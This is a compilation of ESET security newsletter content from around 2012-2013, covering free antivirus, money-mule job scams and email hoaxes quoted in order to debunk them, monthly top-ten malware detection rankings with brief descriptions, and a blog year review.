In fact, the AV market is not simply divided into free and commercial scanners. There are a few scanners that are completely free, though I can’t think of one I’d recommend. There are scanners that are free for non-commercial use.  There are short-life evaluation copies of commercial scanners (and even full suites) like ESET’s 30-day trials. There are free web-based scanners (we have one of those, too), though they’re not a complete substitute for a full-blown AV product, free or otherwise.  There are fully supported commercial scanners that don’t have all the bells and whistles of a security suite (best used in tandem with other types of security software such as a personal firewall). And there are full-blown security suites, which provide multilayered protection but are hardly ever free.

While free AV doesn’t contribute anything to my steak and Merlot fund, it’s a good thing that people are using it: as long as it’s a legitimate and competent product, it’s a great deal better than no protection at all. But it’s a dangerous world out there, and free AV doesn’t mitigate as many risks as a full suite, and it isn’t as well supported. To claim otherwise is just wishful thinking.

Righard Zwienenberg went into considerable detail on the ‘hidden costs’ of free AV in Why Anti-Virus is not a waste of money.

Job Scammers Will Take Anyone’s Money

Urban Schrott, IT Security & Cybercrime Analyst, ESET Ireland
David Harley, Senior Research Fellow, ESET North America

It’s all too common for job offers to turn out to be some form of 419 or other Advance Fee Fraud (AFF) or a poorly paid work-from-home job. However, sometimes the job offered actually involves participating in money laundering as a money mule, though oddly enough, that’s never the job title – that’s more likely to be something like ‘financial assistant’ or even ‘financial director’. Unfortunately, it’s possible for a naive victim to believe they’re working for a legitimate company and not realize that they’re breaking the law until the police come a-knocking.

These are global problems, not just an issue in Ireland, but apart from an overwhelming quantity of online banking scams hitting Irish mailboxes, ESET Ireland has in the recent months observed that the cybercriminals are also working particularly hard on exploiting the misfortune of those worst hit by the economic situation, with the same immoral cynicism they apply when promoting fake charities or fraudulent donations during natural disasters.

Official-looking emails, equipped with company logotypes and addresses, are circulating, offering everything from easy and affordable loans, offers to work from home for an online enterprise,  to completing financial transactions and taking a cut for yourself. All topics specifically aimed at those that found themselves out of work and regular income.

Even if they sound promising enough and will claim to provide the receiver with something, either a loan, a job or a transaction fee, most of these offers will sooner or require the victim to pay some advance fee or provide some delicate personal data, such as bank account or credit card numbers, or they will go straight for the main prize.

How does the scam part usually work then? The victim receives an uncovered cheque or other counterfeit proof of payment to themselves, while they are expected to forward on their actual funds immediately. By the time they get confirmation they didn’t actually receive anything from the scammers and that the checque or other proof of payment is worthless, they have already parted with their own money via the untraceable Western Union and the scammers walk away with a hefty profit.

This is a slightly different example, though.

I would like to know if you are interested to work from home for us 

WHAT YOU NEED TO DO FOR US?

My Company needs a financial representative who will serve as our Agent  in processing any of our funds made out to us by our CANADA, EUROPE &  AMERICAN customers, Why we need you to represent us there is because  the payments Takes a long period of time to clear in our banks in UK,  and due to Frequent Request and supplies of product we do not meet  our demand due to this Failure So that why we seek your time and  assistance. 

JOB DESCRIPTION

1. Receive payment (America Cheques/EUROPE DRAFT) from Clients which will get to you through a courier service

2. Cash Payments at your Bank

3. Deduct 10% which will be your percentage/pay on Payment processed. 4. Forward balance after deduction of percentage/pay to any of the Offices you will be contacted to send payment to (Payment is to Forwarded By Western Union Money Transfer).

This looks like a money mule solicitation, the sort of ‘job offer’ by which someone out of work might be particularly vulnerable to being conned. And in fact, the victim may actually make some money out of the deal. But it’s still bad news for someone who takes up the offer, who is likely to find that sooner or later he’ll attract the attention of the police and be left holding the bag, with his bank account closed and his assets frozen, at least until it can be sorted out what proportion of those assets have been acquired through involvement in money laundering. The sad thing is that the victim may honestly believe he has a legitimate job for a legitimate company, hard though that is to understand for anyone with a modicum of healthy scepticism. Of course that doesn’t mean the scammer won’t demand some sort of advance fee in order to get a little extra profit, and in fact we see 419 versions that are probably more interested in scamming the recipient than in real money laundering.

Needless to say, the golden rule “If it sounds too good to be true, it probably is” should be applied rather vigorously to most, if not all, such emails. The only goal of the cybercriminals is to make money. Any offers they make, any promises or good deals they offer, all serve their main purpose, to get to some of your money and make it theirs.

Spam filtering should limit the amount of such scams you receive, but some may also arrive through Facebook messages, chat or phone texts. In either case, use common sense if you receive them, do not reply to any of them and warn your friends to be careful too.

 

Top Ten Threats at a Glance (graph)

Analysis of ESET LiveGrid®, a sophisticated malware reporting and tracking system, shows that the highest number of detections this month, with almost 3.32% of the total, was scored by the INF/Autorun class of threat.

Top_10_ELG_febrero_13_eng

1.  INF/Autorun

Previous Ranking: 1
Percentage Detected: 3.32%

This detection label is used to describe a variety of malware using the file autorun.inf as a way of compromising a PC. This file contains information on programs meant to run automatically when removable media (often USB flash drives and similar devices) are accessed by a Windows PC user. ESET security software heuristically identifies malware that installs or modifies autorun.inf files as INF/Autorun unless it is identified as a member of a specific malware family.

Removable devices are useful and very popular: of course, malware authors are well aware of this, as INF/Autorun’s frequent return to the number one spot clearly indicates. Here’s why it’s a problem.

The default Autorun setting in Windows will automatically run a program listed in the autorun.inf file when you access many kinds of removable media. There are many types of malware that copy themselves to removable storage devices: while this isn’t always the program’s primary distribution mechanism, malware authors are always ready to build in a little extra “value” by including an additional infection technique.

While using this mechanism can make it easy to spot for a scanner that uses this heuristic, it’s better, as Randy Abrams has suggested in our blog (http://www.eset.com/threat-center/blog/?p=94; http://www.eset.com/threat-center/blog/?p=828) to disable the Autorun function by default, rather than to rely on antivirus to detect it in every case. You may find Randy’s blog at http://www.eset.com/threat-center/blog/2009/08/25/now-you-can-fix-autorun useful, too.

2. HTML/Iframe.B

Previous Ranking: 2
Percentage Detected: 2.99%

Type of infiltration: Virus
HTML/Iframe.B is generic detection of malicious IFRAME tags embedded in HTML pages, which redirect the browser to a specific URL location with malicious software

3. Win32/Sality

Previous Ranking: 5
Percentage Detected: 2.17%

Sality is a polymorphic file infector. When run starts a service and create/delete registry keys related with security activities in the system and to ensure the start of malicious process each reboot of operating system.
It modifies EXE and SCR files and disables services and process related to security solutions.
More information relating to a specific signature:
http://www.eset.eu/encyclopaedia/sality_nar_virus__sality_aa_sality_am_sality_ah

4. HTML/ScrInject.B

Previous Ranking: 3
Percentage Detected: 1.96%

Generic detection of HTML web pages containing script obfuscated or iframe tags that that automatically redirect to the malware download.

5. Win32/Dorkbot

Previous Ranking: 8
Percentage Detected: 1.81%

Win32/Dorkbot.A is a worm that spreads via removable media. The worm contains a backdoor. It can be controlled remotely. The file is run-time compressed using UPX.
The worm collects login user names and passwords when the user browses certain web sites. Then, it attempts to send gathered information to a remote machine.  This kind of worm can be controlled remotely.

6. Win32/Ramnit

Previous Ranking: 7
Percentage Detected: 1.74%

It is a file infector. It’s a virus that executes on every system start.It infects dll and exe files and also searches htm and html files to write malicious instruction in them. It exploits vulnerability on the system (CVE-2010-2568) that allows it to execute arbitrary code. It can be controlled remotley to capture screenshots, send gathered information, download files from a remote computer and/or the Internet, run executable files or shut down/restart the computer.

7. Win32/Conficker

Previous Ranking: 6
Percentage Detected: 1.39%

The Win32/Conficker threat is a network worm originally propagated by exploiting a recent vulnerability in the Windows operating system. This vulnerability is present in the RPC sub-system and can be remotely exploited by an attacker without valid user credentials. Depending on the variant, it may also spread via unsecured shared folders and by removable media, making use of the Autorun facility enabled at present by default in Windows (though not in Windows 7).

Win32/Conficker loads a DLL through the svchost process. This threat contacts web servers with pre-computed domain names to download additional malicious components. Fuller descriptions of Conficker variants are available at http://www.eset.eu/buxus/generate_page.php?page_id=279&lng=en.

While ESET has effective detection for Conficker, it’s important for end users to ensure that their systems are updated with the Microsoft patch, which has been available since the third quarter of 2008, so as to avoid other threats using the same vulnerability. Information on the vulnerability itself is available at http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx. While later variants dropped the code for infecting via Autorun, it can’t hurt to disable it: this will reduce the impact of the many threats we detect as INF/Autorun. The Research team in San Diego has blogged extensively on Conficker issues: http://www.eset.com/threat-center/blog/?cat=145

It’s important to note that it’s possible to avoid most Conficker infection risks generically, by practicing “safe hex”: keep up-to-date with system patches, disable Autorun, and don’t use unsecured shared folders. In view of all the publicity Conficker has received and its extensive use of a vulnerability that’s been remediable for so many months, we’d expect Conficker infections to be in decline by now if people were taking these commonsense precautions. While the current ranking looks like a drop in Conficker prevalence, this figure is affected by the changes in naming and statistical measurement mentioned earlier: there’s no indication of a significant drop in Conficker infections covering all variants.

8. Win32/Qhost

Previous Ranking: 4
Percentage Detected: 1.31 %

This threat copies itself to the %system32% folder of Windows before starting. It then communicates over DNS with its command and control server. Win32/Qhost can spread through e-mail and gives control of an infected computer to an attacker.

9. JS/TrojanDownloader.Iframe.NKE

Previous Ranking: 9
Percentage Detected: 0.84%

It is a trojan that redirects the browser to a specific URL location with malicious software. The program code of the malware is usually embedded in HTML pages.

10. Win32/Virut

Previous Ranking: 32
Percentage Detected: 0.79%

Win32/Virut is a polymorphic file infector. It affects files with EXE and SCR extensions, by adding the threat itself to the last section of the files source code. Aditionally, it searches for htm, php and asp files adding to them a malicious iframe. The virus connects to the IRC network. It can be controlled remotely.

 

 

Monthly Threat Report: January 2013

Fact, Fiction, and Old-Time Movies

David Harley CITP FBCS CISSP, ESET Senior Research Fellow

In a world where nothing seems to be constant but change, it’s good to know that there are, in fact, some things that change fairly slowly. Unfortunately,  readiness to believe and spread hoaxes is one of them. Even worse, they’re often the same hoaxes that were being spread years and even decades ago.  Here’s a hoax message – actually two hoaxes shoehorned into the same message – that was passed on to me this month. It goes back well over a decade: my wife (who received it from a well-meaning friend) and I are both pretty sure we saw hoaxes very much like this in the 1990s. While this version was received by email, the same or similar hoaxes are also spread via social media, especially Facebook. By the way, I’ve cleaned up the hoax text just a little, mostly to remove a plethora of redundant space characters.

URGENT – PLEASE READ – NOT A JOKE

Well, it’s certainly not funny.  (Even less so if your name happens to be Simon Ashton.) Perhaps the number of hoaxes passed on with assurances that “this is not a joke” or “this is real”, do at least indicate that people are a little more sceptical than they used to be.]

IF A PERSON CALLED SIMON ASHTON (SIMON25@HOTMAIL.CO.UK) CONTACTS YOU THROUGH EMAIL DON’T OPEN THE MESSAGE. DELETE IT  BECAUSE HE IS A HACKER!!

In fact, this message has been spread using a variety of names for the ‘hacker’ over the years: recent versions name, for example, Christopher Butterfield, Tanner Dwyer, Stefania Colac or Alejando Spiljner. Often, it’s claimed that the alleged hacker will contact you with a friend request, which gives it an extra air of authority when spread by Facebook. In those instances, however, you’re less likely to encounter the next paragraph, which is email-specific, in a muddled and seriously unconvincing sort of way.

TELL EVERYONE ON YOUR  LIST   BECAUSE IF SOMEBODY ON YOUR LIST ADDS  HIM  THEN YOU WILL GET HIM ON YOUR LIST. HE WILL FIGURE  OUT YOUR ID COMPUTER ADDRESS, SO COPY AND PASTE THIS MESSAGE  TO EVERYONE EVEN IF YOU DON’T CARE FOR THEM AND FAST BECAUSE  IF HE HACKS THEIR EMAIL HE HACKS YOUR MAIL TOO!!!!!……

And at this point we get an abrupt change of focus topic, though it isn’t flagged as such. Still, the fact that the message suddenly stops being all capitals is a bit of a giveaway. Excessive capitalization, by the way, is often a feature of hoax messages, no doubt in order to impress upon us how SERIOUS AND TRUE the message is.

Anyone-using Internet mail such as Yahoo, Hotmail, AOL and so on..   This information arrived this morning, Direct from both Microsoft and Norton. Please send it to everybody you know who has access to the Internet. You may receive an apparently harmless e-mail titled  ‘Mail Server Report’

Where to start on debunking this? Well, the fact that this targets everyone who uses Internet email and everyone who has Internet access should tell you something about the sender’s motivation, and I don’t mean sheer altruism.

Back when I first saw this message(or something very close), the idea that a message from Microsoft was likely to be an authoritative indicator of importance in terms of security was less convincing, but since then Microsoft has become both more security-conscious and a security vendor in its own right, so I guess that bit has actually gained (spurious) authority.

The assertion that ‘This information arrived this morning’ is something of a giveaway in itself. Hoaxes are notoriously vague about exact dates and, in fact, any information that might help you locate authentic information (corroborative or otherwise). The weakness of this approach is that if the recipient actually notices that the message has been forwarded many times to many people,  he might actually start thinking about which morning that might have been, and look for more information. However, the impressive list of previous recipients on this particular email strongly suggests that plenty of people don’t take that extra conceptual step.

This hoax is a variation on the ‘Life is beautiful’ hoax, which claimed that the message would include a malicious file masquerading as a Powerpoint presentation called Life is beautiful.pps. As it happens, there was a possibility long ago that a malicious file would arrive with a specific and identifiable filename. Well, I suppose it’s still possible, but the authors of real malware learned long ago that there are all too many ways to vary the name of a malicious file spammed out with email, so it’s not very likely. In this case, though, the hoax somehow got tangled up with real (but long gone) variants of the Win32/Warezov mass-mailer that arrived in an email claiming to be a ‘Mail Server Report’.  Sometimes, though not in this case, the hoax picks up an additional ‘verified by Snopes’ message, based on the fact that Snopes – a well-known reference source for information on hoaxes, urban legends and such – listed the real Warezov malware as true.

If you open either file, a message will appear on your screen saying:  ‘It is too late now, your life is no  longer  beautiful.’

Obviously a hangover from the Life is beautiful version.

Subsequently you will LOSE EVERYTHING IN YOUR PC,
And the person who o  sent it to you will gain access to your  name, e-mail and  password.

The usual drivel. Well, some or all of this might happen to you as a result of malware, but not the fictitious malware described in the message.

This is a new virus which started to circulate on Saturday afternoon.. AOL has already confirmed the severity, and the anti virus software’s are not capable of destroying it ..

Gosh. This must be some serious virus. Not only has it turned Saturday into the day before Friday (or perhaps it was circulating for a week before anyone noticed their system had been trashed) , but AV is incapable of defeating it. I know that the likes of Imperva are still constantly claiming we can’t detect malware, but even they don’t usually go so far as to claim that we can’t remove malware we know about. And I’m not sure how anyone can know so much about the timeline of a virus that destroys every system it touches.

AOL? Well, I guess that’s an indication of how old the hoax is, going back to the days when the newsagents were perpetually tripping over AOL diskettes and CDs that had fallen off computer magazines, and hoaxes were constantly citing AOL and Microsoft in order to make themselves seem more ‘authentic’ and scary.

The virus has been created by a hacker who calls himself  ‘life  owner’..

Complete with extra period character to give it more weight. Or at any rate, so as to make the line a little longer. This line is another hangover from ‘Life is beautiful’.

Hark! There’s the tinkling sound of another angel getting his wings! Oh, sorry: I’m just getting confused between fiction and Frank Capra movies.

Virus Bulletin 2012 – two souvenirs

2012′s Virus Bulletin conference in Dallas was pretty successful for ESET: you could barely move for ESET researchers on their way to or from their own presentations. A couple more ESET papers have now been put up on the conference papers page. Both papers were first published in the Virus Bulletin 2012 Conference proceedings, and are available here by kind permission of Virus Bulletin, which holds the copyright.

BYOD: (B)rought (Y)our (O)wn (D)estruction?
By Righard Zwienenberg

Nowadays all employees bring their own Internet-aware devices to work. Employers and institutions such as schools think they can save a lot of money by having their employees or students use their own kit. But is that true, or are they over-influenced by financial considerations?

There are many pros and cons with the BYOD trend. The sheer range of different devices that might need to be supported can cause problems, not all of them obvious. This paper will list the pros and cons, including those for Internet-aware devices that people do not think of as dangerous or even potentially dangerous.

These devices are often ‘powered’ by applications downloaded from some kind of App-Store/Market. The applications there should be safe, but are they? What kind of risks do they pose for personal or corporate data? Furthermore, the paper will describe different vectors of attack towards corporate networks and the risk of intractable data leakage problems: for example, encryption of company data on portable devices is by no means common practice. Finally, we offer advice on how to handle BYOD policies in your own environment and if it is really worth it. Maybe ‘Windows To Go’ – a feature of Windows 8 that boots a PC from a Live USB stick which contains Win8, applications plus Group Policies applied by the admin – is a suitable base model for converting BYOD into a Managed By IT Device.

Remember: BYOD isn’t coming, it is here already and it is (B)ig, (Y)et (O)utside (D)efence perimeters!

Dorkbot: Hunting Zombies in Latin America
By Pablo Ramos

Win32/Dorkbot appeared at the beginning of 2011, and in just a couple of months the volume of Dorkbot detections increased until it became the malware with the most impact in Latin America over the whole year. This threat uses removable media and social networks as its means of spreading and achieved the highest position in threat ranking statistics in only three months. Ngrbot (as its author prefers to call it, or Win32/Dorkbot as the AV industry prefers) stands out as the favourite crime pack for Latin America’s cybercriminals and it is widely disseminated through a wide variety of media and vectors.

Lots of small botnets have been detected and are being used for information theft such as personal data and home banking credentials from compromised computers. Spreading through .LNK files via removable media, customized messages through social networks like Facebook, and using local news or compromised web pages, systems are being converted into bots controlled through the IRC protocol.

In this paper the main capabilities and features of Win32/Dorkbot are introduced, and we show its evolution into different versions, starting with AUTORUN spreading, and moving on to the use of LNK files and information-stealing techniques. Win32/Dorkbot.B is the most widely spread variant of this worm, its constructor having been leaked and made available on the web. We tracked down one of the active botnets in the region and reviewed the main activities performed by the cybercriminals.

The investigation came up with thousands of bot computers reporting to the bot master, who used several servers and vulnerable web pages for the implementation of phishing attacks and propagation of threats.

Social media messages have been used to spread copies of this malware through Facebook and Windows Live Messenger. Some of the topics used for spreading included presidents, celebrities and accidents all over the continent and the rest of the world. Also, email accounts are being stolen/hijacked by this malware.

We also comment on why and in what ways Win32/Dorkbot’s activity in Latin America differs from the rest of the world, including trends that involve Internet usage, social media and user education. These combinations are a direct cause of the massive infection rates detected in the region. The main features, including botnet control, bot commands and protocols are described in this paper.

The Top Ten Threats

Analysis of ESET Live Grid, a sophisticated malware reporting and tracking system, shows that the highest number of detections this month, with almost 3.27% of the total, was scored by the INF/Autorun class of threat.

Top_10_ELG_enero_13_eng

1.  INF/Autorun

Previous Ranking: 1
Percentage Detected: 3.27%

This detection label is used to describe a variety of malware using the file autorun.inf as a way of compromising a PC. This file contains information on programs meant to run automatically when removable media (often USB flash drives and similar devices) are accessed by a Windows PC user. ESET security software heuristically identifies malware that installs or modifies autorun.inf files as INF/Autorun unless it is identified as a member of a specific malware family.

Removable devices are useful and very popular: of course, malware authors are well aware of this, as INF/Autorun’s frequent return to the number one spot clearly indicates. Here’s why it’s a problem.

The default Autorun setting in Windows will automatically run a program listed in the autorun.inf file when you access many kinds of removable media. There are many types of malware that copy themselves to removable storage devices: while this isn’t always the program’s primary distribution mechanism, malware authors are always ready to build in a little extra “value” by including an additional infection technique.

While using this mechanism can make it easy to spot for a scanner that uses this heuristic, it’s better, as Randy Abrams has suggested in our blog (http://www.eset.com/threat-center/blog/?p=94; http://www.eset.com/threat-center/blog/?p=828) to disable the Autorun function by default, rather than to rely on antivirus to detect it in every case. You may find Randy’s blog at http://www.eset.com/threat-center/blog/2009/08/25/now-you-can-fix-autorun useful, too.

2. HTML/Iframe.B

Previous Ranking: 3
Percentage Detected: 2.77%

Type of infiltration: Virus
HTML/Iframe.B is generic detection of malicious IFRAME tags embedded in HTML pages, which redirect the browser to a specific URL location with malicious software

3. HTML/ScrInject.B

Previous Ranking: NA
Percentage Detected: 2.66%

Generic detection of HTML web pages containing script obfuscated or iframe tags that that automatically redirect to the malware download.

4. Win32/Qhost

Previous Ranking: 4
Percentage Detected: 2.13%

This threat copies itself to the %system32% folder of Windows before starting. It then communicates over DNS with its command and control server. Win32/Qhost can spread through e-mail and gives control of an infected computer to an attacker.

5. Win32/Sality

Previous Ranking: 12
Percentage Detected: 1.61%

Sality is a polymorphic file infector. When run starts a service and create/delete registry keys related with security activities in the system and to ensure the start of malicious process each reboot of operating system.
It modifies EXE and SCR files and disables services and process related to security solutions.
More information relating to a specific signature:
http://www.eset.eu/encyclopaedia/sality_nar_virus__sality_aa_sality_am_sality_ah

6. Win32/Conficker

Previous Ranking: 2
Percentage Detected: 3.40%

The Win32/Conficker threat is a network worm originally propagated by exploiting a recent vulnerability in the Windows operating system. This vulnerability is present in the RPC sub-system and can be remotely exploited by an attacker without valid user credentials. Depending on the variant, it may also spread via unsecured shared folders and by removable media, making use of the Autorun facility enabled at present by default in Windows (though not in Windows 7).

Win32/Conficker loads a DLL through the svchost process. This threat contacts web servers with pre-computed domain names to download additional malicious components. Fuller descriptions of Conficker variants are available at http://www.eset.eu/buxus/generate_page.php?page_id=279&lng=en.

While ESET has effective detection for Conficker, it’s important for end users to ensure that their systems are updated with the Microsoft patch, which has been available since the third quarter of 2008, so as to avoid other threats using the same vulnerability. Information on the vulnerability itself is available at http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx. While later variants dropped the code for infecting via Autorun, it can’t hurt to disable it: this will reduce the impact of the many threats we detect as INF/Autorun. The Research team in San Diego has blogged extensively on Conficker issues: http://www.eset.com/threat-center/blog/?cat=145

It’s important to note that it’s possible to avoid most Conficker infection risks generically, by practicing “safe hex”: keep up-to-date with system patches, disable Autorun, and don’t use unsecured shared folders. In view of all the publicity Conficker has received and its extensive use of a vulnerability that’s been remediable for so many months, we’d expect Conficker infections to be in decline by now if people were taking these commonsense precautions. While the current ranking looks like a drop in Conficker prevalence, this figure is affected by the changes in naming and statistical measurement mentioned earlier: there’s no indication of a significant drop in Conficker infections covering all variants.

7. Win32/Ramnit

Previous Ranking: 7
Percentage Detected: 1.17%

It is a file infector. It’s a virus that executes on every system start.It infects dll and exe files and also searches htm and html files to write malicious instruction in them. It exploits vulnerability on the system (CVE-2010-2568) that allows it to execute arbitrary code. It can be controlled remotley to capture screenshots, send gathered information, download files from a remote computer and/or the Internet, run executable files or shut down/restart the computer

8. Win32/Dorkbot

Previous Ranking: 5
Percentage Detected: 1.15%

Win32/Dorkbot.A is a worm that spreads via removable media. The worm contains a backdoor. It can be controlled remotely. The file is run-time compressed using UPX.
The worm collects login user names and passwords when the user browses certain web sites. Then, it attempts to send gathered information to a remote machine.  This kind of worm can be controlled remotely.

9. JS/TrojanDownloader.Iframe.NKE

Previous Ranking: 6
Percentage Detected: 1.08%

It is a trojan that redirects the browser to a specific URL location with malicious software. The program code of the malware is usually embedded in HTML pages.

10. Win32/Sirefef

Previous Ranking: 9
Percentage Detected: 0.76%

Win32/Sirefef.A is a trojan that redirects results of online search engines to web sites that contain adware.

Monthly Threat Report: December 2012

Top Ten Threats at a Glance (graph)

Analysis of ESET Live Grid, a sophisticated malware reporting and tracking system, shows that the highest number of detections this year INF/Autorun, with almost 5.17% of the total, was scored by the INF/Autorun class of threat.

Top_10_ELG_anual_eng

The Top Ten Threats of 2012

1.  INF/Autorun

Percentage Detected: 5.17%

This detection label is used to describe a variety of malware using the file autorun.inf as a way of compromising a PC. This file contains information on programs meant to run automatically when removable media (often USB flash drives and similar devices) are accessed by a Windows PC user. ESET security software heuristically identifies malware that installs or modifies autorun.inf files as INF/Autorun unless it is identified as a member of a specific malware family.

Removable devices are useful and very popular: of course, malware authors are well aware of this, as INF/Autorun’s frequent return to the number one spot clearly indicates. Here’s why it’s a problem.

The default Autorun setting in Windows will automatically run a program listed in the autorun.inf file when you access many kinds of removable media. There are many types of malware that copy themselves to removable storage devices: while this isn’t always the program’s primary distribution mechanism, malware authors are always ready to build in a little extra “value” by including an additional infection technique.

While using this mechanism can make it easy to spot for a scanner that uses this heuristic, it’s better, as Randy Abrams has suggested in our blog (http://www.eset.com/threat-center/blog/?p=94; http://www.eset.com/threat-center/blog/?p=828) to disable the Autorun function by default, rather than to rely on antivirus to detect it in every case. You may find Randy’s blog at http://www.eset.com/threat-center/blog/2009/08/25/now-you-can-fix-autorun useful, too.

2. HTML/ScrInject.B

Percentage Detected: 4.44%

Generic detection of HTML web pages containing script obfuscated or iframe tags that that automatically redirect to the malware download.

3. HTML/Iframe.B

Percentage Detected: 3.51%

Type of infiltration: Virus
HTML/Iframe.B is generic detection of malicious IFRAME tags embedded in HTML pages, which redirect the browser to a specific URL location with malicious software

4. Win32/Conficker

Percentage Detected: 3.00%

The Win32/Conficker threat is a network worm originally propagated by exploiting a recent vulnerability in the Windows operating system. This vulnerability is present in the RPC sub-system and can be remotely exploited by an attacker without valid user credentials. Depending on the variant, it may also spread via unsecured shared folders and by removable media, making use of the Autorun facility enabled at present by default in Windows (though not in Windows 7).

Win32/Conficker loads a DLL through the svchost process. This threat contacts web servers with pre-computed domain names to download additional malicious components. Fuller descriptions of Conficker variants are available at http://www.eset.eu/buxus/generate_page.php?page_id=279&lng=en.

While ESET has effective detection for Conficker, it’s important for end users to ensure that their systems are updated with the Microsoft patch, which has been available since the third quarter of 2008, so as to avoid other threats using the same vulnerability. Information on the vulnerability itself is available at http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx. While later variants dropped the code for infecting via Autorun, it can’t hurt to disable it: this will reduce the impact of the many threats we detect as INF/Autorun. The Research team in San Diego has blogged extensively on Conficker issues: http://www.eset.com/threat-center/blog/?cat=145

It’s important to note that it’s possible to avoid most Conficker infection risks generically, by practicing “safe hex”: keep up-to-date with system patches, disable Autorun, and don’t use unsecured shared folders. In view of all the publicity Conficker has received and its extensive use of a vulnerability that’s been remediable for so many months, we’d expect Conficker infections to be in decline by now if people were taking these commonsense precautions. While the current ranking looks like a drop in Conficker prevalence, this figure is affected by the changes in naming and statistical measurement mentioned earlier: there’s no indication of a significant drop in Conficker infections covering all variants.

5. Win32/Sality

Percentage Detected: 1.61%

Sality is a polymorphic file infector. When run starts a service and create/delete registry keys related with security activities in the system and to ensure the start of malicious process each reboot of operating system.
It modifies EXE and SCR files and disables services and process related to security solutions.
More information relating to a specific signature:
http://www.eset.eu/encyclopaedia/sality_nar_virus__sality_aa_sality_am_sality_ah

6. Win32/Dorkbot

Percentage Detected: 1.55%

Win32/Dorkbot.A is a worm that spreads via removable media. The worm contains a backdoor. It can be controlled remotely. The file is run-time compressed using UPX.
The worm collects login user names and passwords when the user browses certain web sites. Then, it attempts to send gathered information to a remote machine.  This kind of worm can be controlled remotely.

7. JS/TrojanDownloader.Iframe.NKE

Percentage Detected: 1.39%

It is a trojan that redirects the browser to a specific URL location with malicious software. The program code of the malware is usually embedded in HTML pages.

8. Win32/Sirefef

Percentage Detected: 1.31%

Win32/Sirefef.A is a trojan that redirects results of online search engines to web sites that contain adware.

9. Win32/Ramnit

Percentage Detected: 0.98%

It is a file infector. It’s a virus that executes on every system start.It infects dll and exe files and also searches htm and html files to write malicious instruction in them. It exploits vulnerability on the system (CVE-2010-2568) that allows it to execute arbitrary code. It can be controlled remotley to capture screenshots, send gathered information, download files from a remote computer and/or the Internet, run executable files or shut down/restart the computer

10. Win32/Spy.Ursnif

Percentage Detected: 0.76%

This is a spyware application that steals information from an infected computer and sends it to a remote location, creating a hidden user account, in order to allow communication over Remote Desktop connections.
What does this mean for the End User?
While there may be a number of clues to the presence of Win32/Spy.Ursnif.A on a system if you’re well-acquainted with esoteric Windows registry settings, its presence will probably not be noticed by the average user, who will not be able to see that the new account has been created.

In any case it’s likely that the detail of settings used by the malware will change over its lifetime. Apart from making sure that security software (including a firewall and, of course, anti-virus software) is installed, active and kept up-to-date, users’ best defense is, as ever, to be cautious and proactive in patching, and in avoiding unexpected file downloads/transfers and attachments.

ThreatBlogger FootSloggers Review 2012

David Harley, ESET Senior Research Fellow

2012 on the ThreatBlog was far too busy to do justice to in a fairly short article: inevitably, I’ll have to leave out some articles. Nevertheless the following summary should at least give you an idea of how the year looked to the blogging team.

January began with a flurry of Facebook-related activity, though it covered a wide range of related topics.

Stephen Cobb wrote about the many scams that preyed on the popular dislike and distrust of Facebook’s imminent Timeline feature: Facebook’s timeline to fraud-a-geddon? In Facebook, your birthday #1, and survey scams  I looked at Facebook memes like ‘the song that was #1 when I was born’ – in my case it was a snappy little number called Sumer is icumen in, I think.

The Facebook watch site Facecrooks flagged a scam based on a fake app that claimed to tell you how much time you’d wasted – sorry, spent – on Facebook, which reminded one of our readers of the persistent ‘see who visits your profile’ scam. (Such an app isn’t possible.) I wrote about it in Facebook scam: the hours I spend…

In Facebook Fakebook: New Trends in Carberp Activity,  Aleksander Matrosov described some changes in the Carberp Trojan, including its gambit for extorting money from Facebook users by displaying a fake Facebook page when they tried to log into FB. The page claims that “Your Facebook account is temporary locked!” and instructs the victim to pay 20 Euros by Ukash voucher.

Of course, other social media were targeted too, as Stephen pointed out  in Tricky Twitter DM hack seeks your credentials, malware infection, and more.

In fact, scams were a very prominent feature of the January threatscape: the first blog of the year, with some input from ESET Ireland’s Urban Schrott, looked at a 419 scam that the scammer took the trouble to translate into Irish Gaelic, though I can’t vouch for the quality of the translation: Irish 419-er seeks Spanish Lady. There was an echo much later in the year when the Irish Times reported the discovery of ‘the first Irish virus’, though it was actually ransomware rather than a real (self-replicative) virus, with the message translated into Irish: Irish Ransomware Report. Somewhat amusingly, Kafeine also drew my attention to a scam message targeting Ireland but translated into Iranian rather than Irish. Some miscommunication there… Ransomware Part III: another drop of the Irish. And Aryeh Goretsky warned us to Beware of SOPA Scams and ZeuS-related malware, rather bizarrely, passed itself off as a phishing message alert from US-CERT and the Anti-Phishing Working Group (Phishing and Taxes: a dead CERT?). Sebastian Bortnik flagged the way that Malware exploits death of North Korea’s Kim Jong-il.

Passwords and passwording has been a pretty constant topic of interest this year, too. In Passwords, passphrases, and big numbers: first the good news… I flagged an interesting paper by Cormac Herley and Paul van Oorschot and linked to a number of resources from ESET and elsewhere that might be of use and interest (so I’m including them here).

And as Cameron Camp described in Zappos.com breach – lessons learned, Zappos.com experienced one of the first major customer authentication breaches of the year but reacted promptly and efficiently.  Cameron also had some good advice for those of us who were enjoying new toys of the tablet persuasion: New Year’s resolutions for securing your new tablet. Peter Stancik asked us if it was Time to check your DNS settings?  and offered advice on how to tell if your system had been infected by DNSChanger malware in advance of the constantly shifting deadline for the shutting down of the servers that were keeping the owners of infected machines online after the botnet was taken down.

We translated and published an English version of ESET Latin America’s predictions for 2012 – New White Paper “Trends for 2012: Malware Goes Mobile” – and Aryeh updated his paper on Possibly Unwanted Applications: Potentially Unwanted Applications White Paper Updated.

In February, I came back to Facebook memes that might not be as harmless as they seem in an article for Virus Bulletin: Living the Meme, while in How to improve Facebook account protection with Login Approvals Stephen complimented Facebook on a security measure while clarifying its use. Cameron looked in CarrierIQ-style data gathering law to require mandatory notification/opt-in? at a bill requiring mandatory consumer consent prior to allowing the collection or transfer of data on smartphones: he also looked at Google’s attempts to beat back the rising tide of Android malware in Google responds to Android app Market security with stronger scanning measures, and at social media’s commoditization of its customer in Facebook/app data privacy – sharing gone wild, and finished the month with a searching examination of the BYOD trend.

